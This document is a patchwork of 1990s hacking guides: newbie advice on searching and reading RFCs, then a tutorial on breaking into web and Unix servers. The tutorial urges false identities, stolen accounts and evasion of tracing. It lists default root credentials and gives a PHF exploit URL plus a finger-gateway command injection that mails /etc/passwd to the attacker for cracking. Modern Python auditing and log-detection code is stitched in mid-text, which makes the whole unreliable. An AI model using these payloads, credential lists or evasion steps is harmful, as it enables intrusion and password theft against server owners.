CDMA vs GSM - carolyn meinel 1995/11/17
Re: October El Nino-Southern Oscillation info gonthier@usgs.gov (Gerard J. Gonthier) 1995/11/20
Re: Internic Wars MrGlucroft@psu.edu (The Reaver) 1995/11/30
shirkahn@earthlink.net (Christopher Proctor) 1995/12/16
Re: Lyndon LaRouche - who is he? lness@ucs.indiana.edu (lester john ness) 1996/01/06
U-B Color Index observation data - cmeinel@nmia.com (Carolyn P. Meinel) 1996/05/13
Re: Mars Fraud? History of one scientist involved gksmiley@aol.com (GK Smiley) 1996/08/11
Re: Mars Life Announcement: NO Fraud Issue twitch@hub.ofthe.net 1996/08/12
Hackers Helper E-Zine wanted - rcortes@tuna.hooked.net (Raul Cortes) 1996/12/06
Carolyn Meinel, Sooooooper Genius - nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node) 1996/12/12
Anyhow, this list goes on and on and on.
But if you specify "Carolyn Meinel hacker" and click "all" instead of "any" on the "Boolean" button, you get a list that starts with:
Media: "Unamailer delivers Christmas grief" - Mannella@ipifidpt.difi.unipi.it (Riccardo Mannella) 1996/12/30
Cu Digest, #8.93, Tue 31 Dec 96 - Cu Digest (tk0jut2@mvs.cso.niu.edu) 1996/12/31
RealAudio interview with Happy Hacker - bmcw@redbud.mv.com (Brian S. McWilliams) 1997/01/08

Etc.
This way all those posts about my boring life in the world of science don't show up, just the juicy hacker stuff.
Now suppose all you want to see is flames about what a terrible hacker I am. You could bring those to the top of the list by adding (with the "all" button still on) "flame" or "f***" or "b****", being careful to spell out those bad words instead of fubarring them with ****s. For example, a search on "Carolyn Meinel hacker flame" with Boolean "all" turns up only one post. This important tome says the Happy Hacker list is a dire example of what happens when us prudish moderator types censor naughty words and inane diatribes.
******************************************
Newbie note: "Boolean" is a math term. On the Dejanews search engine they figure the user doesn't have a clue of what "Boolean" means so they give you a choice of "any" or "all" and then label it "Boolean" so you feel stupid if you don't understand it. But in real Boolean algebra we can use the operators "and", "or" and "not" on word searches (or any searches of sets). "And" means you would have a search that turns up only items that have "all" the terms you specify; "or" means you would have a search that turns up "any" of the terms. The "not" operator would exclude items that included the "not" term even if they have any or all of the other search terms. Altavista has real Boolean algebra under its "advanced" search option.
******************************************
But let's forget all those Web search engines for a minute. In my humble yet old-fashioned opinion, the best way to search the Web is to use it exactly the way its inventor, Tim Berners-Lee, intended. You start at a good spot and then follow the links to related sites. Imagine that!
Here's another of my old fogie tips. If you want to really whiz around the Web, and if you have a shell account, you can do it with the program lynx. At the prompt, just type "lynx" followed by the URL you want to visit. Because lynx only shows text, you don't have to waste time waiting for the

More how to search for hacker knowledge...
So where are good places to start? Simply surf over to the Web sites listed at the end of this Guide. Not only do they carry archives of these Guides, they carry a lot of other valuable information for the newbie hacker, as well as links to other quality sites. My favorites are http://www.cs.utexas.edu/users/matt/hh.html and http://www.silitoad.org
Warning: parental discretion advised. You'll see some other great starting points elsewhere in this Guide, too.
Next, consider one of the most common questions I get: "How do I break into a computer????? :( :("
Ask this of someone who isn't a super nice elderly lady like me and you will get a truly rude reaction. Here's why. The world is full of many kinds of computers running many kinds of software on many kinds of networks. How you break into a computer depends on all these things. So you need to thoroughly study a computer system before you can even think about planning a strategy to break into it. That's one reason breaking into computers is widely regarded as the pinnacle of hacking. So if you don't realize even this much, you need to do lots and lots of homework before you can even dream of breaking into computers.
But, OK, I'll stop hiding the secrets of universal computer breaking and entry. Check out:
Bugtraq archives:
NT Bugtraq archives:
***************************************************
You can go to jail warning: If you want to take up the sport of breaking into computers, you should either do it with your own computer, or else get the permission of the owner if you want to break into someone else's computer. Otherwise you are violating the law. In the US, if you break into a computer that is across a state line from where you launch your attack, you are committing a Federal felony. If you cross national boundaries to hack, remember that most nations have treaties that allow them to extradite criminals from each others' countries.
***************************************************
Wait just a minute, if you surf over to those sites you won't instantly become an Ubercracker. Unless you already are an excellent programmer and knowledgeable in Unix or Windows NT, you will discover the information at these two sites will *NOT* instantly grant you access to any victim computer you may choose. It's not that easy. You are going to have to learn how to program. Learn at least one operating system inside and out.
Of course some people take the shortcut into hacking. They get their phriends to give them a bunch of canned break-in programs. Then they try them on one computer after another until they stumble into root and accidentally delete system files. Then they get busted and run to the Electronic Freedom Foundation and whine about how the Feds are persecuting them.
So are you serious? Do you *really* want to be a hacker badly enough to learn an operating system inside and out? Do you *really* want to populate your dreaming hours with arcane communications protocol topics? The old-fashioned, and super expensive way is to buy and study lots of manuals. Look, I'm a real believer in manuals. I spend about $200 per month on them. I read them in the bathroom, while sitting in traffic jams, and while waiting for doctor's appointments. But if I'm at my desk, I prefer to read manuals and other technical documents from the Web. Besides, the Web stuff is free!
The most fantastic Web resource for the aspiring geek, er, hacker, is the RFCs. RFC stands for "Request for Comment." Now this sounds like nothing more than a discussion group. But actually RFCs are the definitive documents that tell you how the Internet works. The funny name "RFC" comes from ancient history when lots of people were discussing how the heck to make that ARPAnet thingy work. But nowadays RFC means "Gospel Truth about How the Internet Works" instead of "Hey Guys, Let's Talk this Stuff Over."
********************************************************
Newbie note: ARPAnet was the US Advanced Research Projects Agency experiment launched in 1969 that evolved into the Internet. When you read RFCs you will often find references to ARPAnet and ARPA -- or sometimes DARPA. That "D" stands for "defense." DARPA/ARPA keeps on getting its name changed between these two. For example, when Bill Clinton became US President in 1993, he changed DARPA back to ARPA because "defense" is a Bad Thing. Then in 1996 the US Congress passed a law changing it back to DARPA because "defense" is a Good Thing.
********************************************************
Now ideally you should simply read and memorize all the RFCs. But there are zillions of RFCs and some of us need to take time out to eat and sleep. So those of us without photographic memories and gobs of free time need to be selective about what we read. So how do we find an RFC that will answer whatever is our latest dumb question?
One good starting place is a complete list of all RFCs and their titles at ftp://ftp.tstt.net.tt/pub/inet/rfc/rfc-index. Although this is an ftp (file transfer protocol) site, you can access it with your Web browser.
(Sorry, that above location is now gone. Nowadays you can find an organized set of RFCs hyperlinked together at Connected: An Internet Encyclopedia. I can't even begin to explain to you how wonderful this site is. You just have to try it yourself. Other sets of searchable RFCs are at:
)
Or, how about the RFC on RFCs! That's right, RFC 825 is "intended to clarify the status of RFCs and to provide some guidance for the authors of RFCs in the future. It is in a sense a specification for RFCs." To find this RFC, or in fact any RFC for which you have its number, just go to Altavista and search for "RFC 825" or whatever the number is. Be sure to put it in quotes just like this example in order to get the best results.
Whoa, these RFCs can be pretty hard to understand! Heck, how do we even know which RFC to read to get an answer to our questions? Guess what, there is a solution, a fascinating group of RFCs called "FYIs". Rather than specifying anything, FYIs simply help explain the other RFCs. How do you get FYIs? Easy! I just surfed over to the RFC on FYIs (1150) and learned that:
FYIs can be obtained via FTP from NIC.DDN.MIL, with the pathname FYI:mm.TXT, or RFC:RFCnnnn.TXT (where "mm" refers to the number of the FYI and "nnnn" refers to the number of the RFC). Login with FTP, username ANONYMOUS and password GUEST. The NIC also provides an automatic mail service for those sites which cannot use FTP. Address the request to SERVICE@NIC.DDN.MIL and in the subject field of the message indicate the FYI or RFC number, as in "Subject: FYI mm" or "Subject: RFC nnnn".
But even better than this is an organized set of RFCs hyperlinked together on the Web at http://www.FreeSoft.org/Connected/. I can't even begin to explain to you how wonderful this site is. You just have to try it yourself. Admittedly it doesn't contain all the RFCs. But it has a tutorial and a newbie-friendly set of links through the most important RFCs.
Last but not least, you can check out two sites that offer a wealth of technical information on computer security:
http://csrc.nist.gov/secpubs/rainbow/
http://GANDALF.ISU.EDU/security/security.html security library
I hope this is enough information to keep you busy studying for the next five or ten years. But please keep this in mind. Sometimes it's not easy to figure something out just by reading huge amounts of technical information. Sometimes it can save you a lot of grief just to ask a question. Even a dumb question. Hey, how would you like to check out the Web site for those of us who make our living asking people dumb questions? Surf over to http://www.scip.org. That's the home page of the Society of Competitive Information Professionals, the home organization for folks like me. So, go ahead, make someone's day. Have phun asking those dumb questions. Just remember to fireproof your phone and computer first!

hacking password protected site

There are many ways to defeat JavaScript-protected web sites. Some are very simplistic, such as hitting Ctrl-Alt-Del when the password box is displayed, to simply turning off Java capability, which will dump you into the default page.
You can try manually searching for other directories by typing the directory name into the URL address box of your browser, i.e. you want access to www.target.com. Try typing www.target.com/images (almost every web site has an images directory). This will put you into the images directory, and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory, i.e. in www.target.com/images there is a .gif named gamestitle.gif. There is a good chance then that there is a 'games' directory on the site, so you would then type in www.target.com/games, and if it is a valid directory, you again get a text listing of all the files available there.
For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all directories, or even mirror a complete server. They are indispensable for locating hidden files and directories.
What do you do if you can't get past an opening "Password Required" box? First do a WHOIS lookup for the site. In our example, www.target.com. We find it's hosted by www.host.com at 100.100.100.1. We then go to 100.100.100.1, and then launch Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K (not many HTML pages are bigger than this). This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time.
Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html. This would be the index page that would be displayed had you gone through the password procedure and allowed it to redirect you here. By simply typing in the URL www.target.com/games/zip/zipindex.html you will be on the index page and ready to follow the links for downloading.

hacking in telnet ftp


INTRODUCTION:

A little background is needed before we get into hacking techniques.

When we talk about ‘Hacking’, we are talking about getting some access on a server we shouldn’t have. Servers are set up so that many people can use them. These people each have different ‘accounts’ on the server – like different directories that belong just to them. If Fred has an account with the froggy.com.au ISP (Internet Service Provider), he will be given:
(1) a login name, which is like the name of your directory; and
(2) a password, which lets you get access to that directory.
This login name and password will usually give you access to all of Fred’s services - his mail, news services and web pages. There is also the ‘root’ account, which has its own login and password. This gives super-user access to the entire server. We will focus on ‘getting root’ in this help file.


THE ANATOMY OF THE 'HACK':
There are two main ways to break into a system. Think of a server as a Swiss Bank Vault. There are two main ways to get in. You can try to get in by finding the combination of the vault. This is like finding the password. It’s how you are meant to get in. The second way is by using dynamite. You forget all about the ‘proper’ way to get in. This is like using ‘exploits’, or weaknesses in the server's operating system, to gain access.


'DON'T GET CAUGHT':

Hacking is illegal, and it is very easy to trace you if froggy.com.au realizes you hacked them. Wherever you go,
your IP number (your computer’s unique identification) is left and often logged. Solutions:

1. When you set up your account with an ISP, give a false name and address.

2. Hack using a filched account (stolen password, etc.). A tool called Dripper can steal passwords for you from public net cafes and libraries.

3. Port your connection through something else.
An easy way to do this is to change your proxy settings. By using the proxy settings meant for a different ISP, it can look like you are surfing from wherever that ISP is. A list of proxies you can use is here .
You should also do any important info gathering through the IP Jamming Applet on the Cyberarmy.Com to hide your IP.
If you want super anonymity, you should be surfing in an account you set up under a false name, with your proxy settings changed, and also surfing through the IP Jamming applet! Be aware that some ISPs could use Caller ID to test the number of someone logging on. Dial the relevant code to disable Caller ID before calling your ISP.



INFO GATHERING:

To start off, you will probably need to gather information about www.froggy.com.au using internet tools.


DIRT DIGGING STAGE:
We are now taking the first steps of any hack... Info Gathering.
You should be set up for stealth mode. Get a notepad, and open a new browser window (through the IP Jammer). Bring www.froggy.com.au's web page up in the IP Jammer's window. You can load the IP Jamming applet on the Cyberarmy.Com.


CASE THE JOINT:
1. First, check out the site. Take down any email addresses, copy down the HTML of important pages.


THE OLD BOUNCING MAIL TRICK:
2. Send a mail that will bounce to the site. If the site is www.froggy.com.au, send a mail to blahblahblah@froggy.com.au. It will bounce back to you and give you information in its header.
Copy the information from the headers down.
(To maintain anonymity, it might be a good idea to send and receive the mail from a free web based provider, such as hotmail.com. Use full stealth features when sending the bouncing mail. This will protect you when they check through the logs after they are hacked.)


TRACEROUTE:
3. Still using stealth features, Traceroute froggy.com.au. This Traceroute search is available from the Hacker's Home Page, in the Net Tools section.
This will tell you the upstream provider of the victim server.


WHOIS:
3. Still using stealth features, Whois the site. This Whois search is available from the Hacker's Home Page, in the Net Tools section.
This will give you information on the owners and servers that run the site. Write it down.


GIVE 'EM THE FINGER:
4. Finger the site. Use this finger service at Cyberarmy.Com to check the site. Try fingering just with “finger @froggy.com.au” first. This sometimes tells you the names of all accounts. If this does not work, try fingering any email addresses you found on the site, and through Whois. This will sometimes give you useful information.


THE DEADLY PORT SCAN:
5. Now, we're about to get rough on the site. Port Scan the site.
Port scanning checks for all open ports for an IP. It is extremely useful; however, it practically screams to the webmasters of the victim site that they are in the middle of being hacked. There is basically no legitimate reason to port scan a site unless you are about to hack it.
There are no very good ways to hide a port scan, but there are a few semi-stealthy port scanners. Most are only for Linux / Unix systems. However, the Exploit Generator for Windows is one that claims to be stealthy. If you are trying to enter a very secure site, perhaps forget about port scanning for now, unless you are running Linux.
Still, a port scan will tell you all the services a site is running. If port 21 is open, it means they have an FTP server. If port 23 is open, it means they have telnet.


TELNETTING:
5. The aim of telnetting to the site is basically to try and find out the server type. While your browser is in stealth mode, use the Anonymous Telnet applet in the Cyberarmy.Com to open a Telnet window.
Telnet to the site on Port 23. Usually, if the address is “www.froggy.com.au”, try telnetting to "froggy.com.au". If this does not work, try to telnet to telnet.froggy.com.au or try telnetting to any of the sites listed as name servers in your previous Whois search. Once you have got access, note any information it gives you, such as server type.

Now change the telnet to port 21. This should send you straight in to the server's FTP port. If this works, try typing SYST to find out what server type it is.

Now, if you are lucky, try telnetting to port 80, the HTTP port. Note if this gives you any information.


RUNNING LAME PROGRAMS:
You *need* to know the server type to have any hope of hacking the thing. How do you expect to run exploits against it if you can't even figure out what you're dealing with here?
A final resort is to run a program called Whats Running? It doesn't work very well, but will sometimes tell you the server type. It will also probably be logged by the victim server.
If that doesn't work, do anything to find the server type. Even write them an e-mail asking what operating system they're running.


HACKING THROUGH THE PASSWORD:
We will now try to go through the front door of the server. As to our analogy, we are trying to find the combination of the safe.


EASY THINGS FIRST:

You would kick yourselves if ya spent weeks trying advanced hacking with exploits, IP spoofing and social
engineering, just to find that we could have got in by using:

$Login: root
$Password: root

So, let’s just try this first and get it out of the way. Unix comes set up with some default passwords, and sometimes these are not changed. So, we telnet to froggy.com.au.

Don’t use your usual telnet program. Unless you are using a filched or anonymous account, it will show your IP address to froggy.com.au. With your proxies changed, and everything set for stealth, switch back to the Anonymous Telnet window.

Then try the following accounts and passwords:

ACCOUNT: PASSWORD
(login) root: (password)root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon

The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level accounts, meaning they have sysop power, or total power. Other logins are just "user level" logins meaning they only have power
over what files/processes they own.


USING THE LOGIN NAMES:
Still simple things first. About 1 in 20 people are stupid enough to have the same login name and password. With your list of all the email addresses or finger information you dug from the site, try this.
For example, if the web site made a reference to fred@froggy.com.au, try logging in (through telnet or an FTP program to their server) as:

$Login: Fred
$Password: Fred

Do this with all the names you have found - you might get lucky.


GETTING THE PASSWD FILE:

You probably had no luck until now. Actually, most hacking techniques only have a slim chance of success. You just try hundreds of slim chances till you get it.
Assuming you were trying to log in on a Unix system, you may have been wondering how Unix checks to see whether the passwords you gave were correct or not. There is a file called ‘passwd’ on each Unix system which has all the passwords for each user. So, if we can’t guess the passwords, we will now try to rip this file and decrypt it.


ANCIENT CHINESE FTP METHOD:
Your browser should be set to use the fake proxies. We will keep using this browser to FTP, because it cannot be easily traced, whereas something like CuteFTP can be traced to you because it can't use proxies. If in your port scan you found an open port 21, it's a pretty good indication that they run an FTP server.
Using your stealth browser, try to FTP to froggy.com.au. Example: ftp://froggy.com.au

If that does not work, try to FTP to ftp.froggy.com.au. Example: ftp://ftp.froggy.com.au

If that does not work, try to FTP to the Domain Name Servers listed when you did your WHOIS search. Example: ftp://ns1.froggy.com.au

Now you are connected to froggy.com.au’s FTP server, click on their /etc directory.
You should see a file called ‘passwd’ and maybe a file called ‘group’. Download the ‘passwd’ file, and
look at it.
If it looks like this when you open it, you are in luck:

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]

For example, we know a login is “kangaroo” and their encrypted password is “3A62i9qr”. Note: this is not their password, but an encrypted form of their password.

Or, did it look more like this:

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh

Is the second, encrypted password, section replaced by *’s or x’s? This is bad – it is called a shadowed password and cannot be decrypted. This is how most passwd files are nowadays. However, if you got a passwd file which has some non-shadowed entries, you can put your hand to decrypting it.
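The conditions the default-password list and the shadowed/unshadowed passwd discussion above describe as an attacker's luck are also what an administrator should be auditing for. This is an added example, not code from the original text: it parses passwd-format lines and flags exposed hashes, empty passwords, extra UID-0 accounts and still-enabled default logins; the sample entries are constructed (two are adapted from the lines shown above).

```python
"""Audit a Unix passwd file from the defender's side: report hashes that
are not shadowed, empty passwords, extra root-level (UID 0) accounts and
default logins that still have a usable password field.
Added example; the sample lines below are constructed."""

# Default/service logins named in the list above; an administrator wants to
# know whether any of these still exist with a usable password field.
DEFAULT_LOGINS = {
    "root", "sys", "bin", "mountfsys", "adm", "uucp", "nuucp", "anon",
    "user", "games", "install", "demo", "umountfsys", "sync", "admin",
    "guest", "daemon",
}

# Password-field values that mean "no usable password stored here".
LOCKED_FIELDS = {"x", "*", "!", "!!", "*LK*", "NP"}


def parse_passwd(text):
    """Return one dict per passwd line; malformed lines are kept and marked."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            # A cut-off or corrupted line (compare the truncated sample above).
            entries.append({"line": lineno, "malformed": True, "raw": line})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({
            "line": lineno, "malformed": False, "name": name, "pw": pw,
            "uid": int(uid) if uid.isdigit() else None, "gid": gid,
            "gecos": gecos, "home": home, "shell": shell,
        })
    return entries


def audit_passwd(text):
    """Return (finding, account) tuples for every risky entry in `text`."""
    findings = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append(("malformed", e["raw"]))
            continue
        pw = e["pw"]
        locked = pw in LOCKED_FIELDS or pw.startswith("!") or pw.startswith("*")
        if pw == "":
            # No password at all: anyone can log in as this account.
            findings.append(("empty-password", e["name"]))
        elif not locked:
            # A real hash sitting in the world-readable passwd file.
            findings.append(("unshadowed-hash", e["name"]))
        if e["uid"] == 0 and e["name"] != "root":
            # A second UID-0 login is a classic backdoor sign.
            findings.append(("extra-uid0", e["name"]))
        if e["name"] in DEFAULT_LOGINS and not locked:
            findings.append(("default-login-enabled", e["name"]))
    return findings


# Constructed sample; the root and kangaroo lines are adapted from the
# example passwd lines shown above.
SAMPLE_PASSWD = """\
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:x:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
toor:x:0:0:backdoor:/:/bin/sh
guest::500:500:Guest account:/home/guest:/bin/sh
broken:3A62i9qr:1013:10:Truncated
"""

if __name__ == "__main__":
    for kind, who in audit_passwd(SAMPLE_PASSWD):
        print(f"{kind:22s} {who}")
```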


DECRYPTING PASSWD FILES:

There are a few programs around which were written to decrypt Unix passwd files. The most famous one was called ‘Cracker Jack’. Many ‘hacking’ texts strongly recommend this file – but they are mostly talking rubbish. It's old and most systems will just crash when they try to run it, as it uses weird memory allocation.
The best Unix cracker around is currently called 'John the Ripper 1.5’. It is readily available. It was only written in the last year or so, and is a lot faster than Cracker Jack ever was. John the Ripper was also designed with Pentiums in mind, and the brute force technique used is genius. But you have to go down to DOS to use it.
You will also need a large ‘wordfile’, with every English word. Bigger the better. The Crack Programs test every word in the wordfile against the passwd file. If the wordfile is big enough, you have a good chance of getting a password.


THE OLD-STYLE PHF TECHNIQUE:
Although most servers have now trashed a program called PHF, let's just make sure... If it is working, it lets you get the passwd file remotely, even if it is inside hidden and root access only directories.
In the Overlord Anonymizer, type:
http://www.froggy.com.au/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
If PHF is active (often not), this string will print out the etc/passwd file straight to your web browser. All you need to do is save it as a file and again run a crack program against it.
Now, if you see the words 'Smile! You're on Candid Camera!', it means that the server is protected against this hack, and has logged your IP. But don't worry. So long as you were using the anonymizer, you are safe.


FINGER BOX HACKING:
Finger servers are hacker's friends. Let's find out whether www.froggy.com.au has a finger server.
In the Anonymizer, assuming that the server's name starts with www, type www.froggy.com.au/cgi-bin/finger
If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have another chance to receive the etc/passwd file.
Okay, 1/ get your list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@froggy.com.au", and that your email address is "your@email.org")
2/ Go back to the finger box, and type this in (changing these email addresses for the real ones):
kangaroo@froggy.com.au ; /bin/mail your@email.org < etc/passwd
This takes the passwd file through kangaroo@froggy.com.au and emails it to your email address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box.
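Both CGI tricks above (the PHF newline injection and a shell metacharacter passed to a finger gateway) leave distinctive requests in the web server's access log, which is what the "Candid Camera" replacement script is logging. The following added example, not part of the original text, scans Common Log Format lines for them; the log lines, hosts and addresses are constructed.

```python
"""Detect the PHF and finger-gateway command injections described above in
Common Log Format access logs. Added example; sample lines are constructed."""
import re
from urllib.parse import unquote_plus

# Common Log Format: host ident user [time] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)

# Characters that let a query string escape the command the CGI meant to run.
SHELL_META = re.compile(r'[;|&`\n]|\$\(')


def classify_request(path):
    """Return a finding name for a suspicious CGI request path, else None."""
    script, _, query = path.partition("?")
    decoded = unquote_plus(query)          # %0a -> newline, %3B -> ';'
    base = script.rsplit("/", 1)[-1].lower()
    if base == "phf":
        # A newline in the query is the classic phf injection; a bare hit on
        # the retired script is still a probe worth recording.
        return "phf-injection" if "\n" in decoded else "phf-probe"
    if base == "finger" and SHELL_META.search(decoded):
        return "finger-injection"
    if "/etc/passwd" in decoded:
        # Any other script being handed the passwd path.
        return "passwd-in-query"
    return None


def scan_log(text):
    """Return (finding, client host, request path) for each suspicious line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not CLF; ignore
        kind = classify_request(m.group("path"))
        if kind:
            findings.append((kind, m.group("host"), m.group("path")))
    return findings


# Constructed log excerpt: one phf injection, one finger injection, one
# harmless finger lookup, one static page, one probe for the phf script.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/1998:13:55:36 -0700] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1432
203.0.113.5 - - [10/Oct/1998:13:56:01 -0700] "GET /cgi-bin/finger?kangaroo%40froggy.com.au+%3B+/bin/mail+x%40example.org+%3C+/etc/passwd HTTP/1.0" 200 88
198.51.100.7 - - [10/Oct/1998:14:02:12 -0700] "GET /cgi-bin/finger?kangaroo HTTP/1.0" 200 310
198.51.100.7 - - [10/Oct/1998:14:03:40 -0700] "GET /index.html HTTP/1.0" 200 2048
203.0.113.5 - - [10/Oct/1998:14:05:00 -0700] "GET /cgi-bin/phf HTTP/1.0" 404 210
"""

if __name__ == "__main__":
    for kind, host, path in scan_log(SAMPLE_LOG):
        print(f"{kind:18s} {host:15s} {path}")
```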


LINUX INSTALLATION
All the above really has given you the basic ideas. To do anything further, and implement any real exploits, you will have to put a Linux operating system on your computer. Below are some instructions on how to quickly and easily install Linux on your computer. You can just download the files below for free, and install them in a directory on your MS-DOS / Windows system! That's right, you don't even have to repartition your Hard Drive!
Okay... I will make this as basic and free as possible. I will assume you are running Windows 95 or 98 and have never seen Linux before. You have a Hard Drive with at least 100MB free. You've got a floppy drive, etc. You know how to unzip files. And you don't want to spend any money. Luckily, Linux is free and easy to set up.
1/ Download this file (Australia). It's big, like 34MB. But it's all you need. If the site there is overloaded, get it here .
2/ What you have is a version of Slackware Linux, called zipslack. It's a very simple version of Slackware Linux to set up. I don't use Slackware, and there are some better versions around now - like RedHat 5.2. But, it is a good stable version - and, like I say, very simple to download and setup. Good for a Linux test drive.
3/ Ok, make a directory called 'Linux' on your Hard Drive. That's right, with this distro, you don't even have to repartition your drive. It can be on the same Hard Drive you have Windows on! (I told you this would be easy). Just make sure it's a major directory on your hard drive, like c:\linux - not in a subdirectory anywhere.
4/ Now, just unzip all the contents of the zipslack.zip into the right directories, like c:\linux\etc, c:\linux\usr, etc.
5/ Now, here's the hardest part. You will have to edit the \linux\linux.bat file. Open it in an editor.
6/ You'll need to edit the LINUX.BAT file, and make sure the root=/dev/XXXX points to your Hard Drive. If you have put it on your main hard drive, you can make the line:
\linux\loadlin \linux\vmlinuz root=/dev/hda1 (hda1 means the IDE1 Master HDD)
I have Linux on my drive D: (the IDE2 Master HDD), and for me the line would be:
\linux\loadlin \linux\vmlinuz root=/dev/hdc1
7/ If you are unsure, the Linux.bat file has a long list of examples. Just guess. If you get it wrong, you'll still be able to use scrollback (right shift key and PageUp) when the kernel halts to go back and look at your partitions, noting the names Linux gives them. With this information, you should be able to edit the LINUX.BAT correctly.
8/ Well, I skipped ahead of myself. You are now (already) ready to boot up your Linux system. Who said it was hard?
9/ Ok, you must go 'Shut Down' and 'Restart in MS-DOS Mode'. Then just go to the \Linux directory ('cd linux') and run Linux.bat
10/ The Linux system will load itself over MS-DOS (though you don't need to load it over DOS - later you can make a boot-disk so only linux loads).
11/ You will see a whole lot of stuff loading. Then you will see a login: prompt.
12/ You have an operating system just like all the big net servers have!
13/ Okay, just type in 'root', and you have root access on the system. You will want to give yourself a password, so type 'passwd'. Choose something you will remember. Without it, you cannot log in.
14/ Now you will have a black screen with a # looking at you. Dont let that worry you - its just like a MS-DOS screen. A few commands for now: 'ls' (like 'dir' in MS-DOS), 'cd' (change directory, like dos), 'pico' (an editor, use like 'pico text.txt'), and 'mc' (this is a nice menu program that comes with zipslack).
15/ Now, type 'setup'.
16/ Setup your mouse, network settings, screen stuff. Really easy. Just like - 'are you using a 2 button mouse or 3'? Easy.
17/ Now, if you want net access, through this - type 'pppsetup'. This starts the ppp (point to point protocol) setup. You will need to know all your internet settings, like your Gateway, Nameserver numbers, etc. If you dont know these, go back to windows and see what values you used from the Control Panel : Internet section.
18/ Okay. Reboot. Your mouse should be working, with some luck. Hopefully, your modem will be able to dial. Though, often not. If you have a standard external modem on Com 2, it is probably okay. Otherwise, it's sometimes a pain to configure your modem for Linux.
19/ If you are having modem troubles, type 'mc' to run the Midnight Commander. Open the 'etc' directory, then 'rc.d', then 'serials.rc'. Comment out the auto config section with '#' signs. And go to the manual config section. Uncomment /dev/cua0 (Com 1:) and /dev/cua1 (Com 2:) - or /dev/cua2 or cua3 (Com 3: or 4:) for internal modem users. Now, from Windows, go to Accessories:System Tools:System Information (Win 98) to get the IRQ and Port Settings for your modem. If you are in Win95, I think you have to run something called msd.com in the \windows directory. Put these settings in. Then, edit S.rc and at the bottom, uncomment the place where it says to call the serials.rc file.
20/ If you have a CD-Rom you can also edit S.rc so that it checks for a CD Rom during bootup.
21/ All things going well, you should now have a fully functional Unix type system on your computer. You can download all your latest little X-Crush programs (in .tgz format). To set up software - say a Linux stealth port scanner - save the .tgz file in a directory and run 'pkgtool'. Then go 'install file'. Real easy. If it is a C program, type 'gcc program.c' to compile it.
22/ Well, you are missing a Windows type interface. You don't need one, but if you want to surf using Linux, etc., it is better to have a graphical interface - although you can run a browser called 'lynx' just through the vanilla Linux interface.
23/ You can get some things, like X-Windows from ftp.cdrom.com/pub/linux/slackware/slakware/x1/
24/ Just get all the files that look vital (about 8 of them), and run pkgtool to install them all. You will probably find that setting up X-Win for the first time is a huge pain. It was for me at least - you need to know, for example, the horizontal and vertical refresh rates of your monitor. Then, get something like the Linux Netscape, or Arena, as a browser. These run through X-Windows.
25/ You will have fun tweaking everything as you like it. There are dozens of window interfaces to choose from. Some look almost identical to Win95.
26/ Where from here? You can now do practically anything - you basically have all the net power your ISP does, except for all the phone lines. You can let people use you as a dial up ISP, you can host web pages and set up FTP sites to run from your computer. You can set up email addresses, nameservers... anything.
27/ Because Linux is the same software as most ISPs run, a lot of hackers use Linux. You will be able to issue commands to other servers. You can ask other servers about themselves. For example, type 'showmount -e victim.com'. You can also run things like 'ping', and 'traceroute' directly from your command line. You can send mail from your own sendmail program so that it is untraceable.
Some last incentives: if you were brought up in the Windows world and are afraid of command prompts, just type 'mc'. The ZipSlack distro comes with this 'Midnight Commander' - which I use a lot. And play a few games on the thing. There are a few old favourites installed by default - like 'trek', and 'adventure', etc. If you were in computers 20 years ago, you will know what I mean. The games directory is /usr/games.
If you have got any more problems, there are a lot of people on the IRC #Linux channel on undernet who are very helpful. If your Linux is set up to the net, you can run the Linux Bitch-X IRC program to get there. Zipslack also has pine (for email), tin (for newsgroups), and lynx (for surfing).
Fact is, once you have had this all working for a few weeks (and are probably loving it), you will no doubt like to try some more advanced Linux distros. Although there are a lot of personal feelings about various distributions, I recommend RedHat 5.2 Linux. You will find it very easy to install.
If you are happy buying through Amazon.Com, here is the best Linux deal I've been able to find anywhere. It deals with the 3 major Linux distributions: Red Hat, Slackware, and Debian - with 3 CDs. It also contains a very good install guide. All for about half the price of the single 'official' RedHat CD. If you like this Linux stuff, I recommend you get it - or at least make sure you get a book that is written very recently.


CURRENT LIMIT:
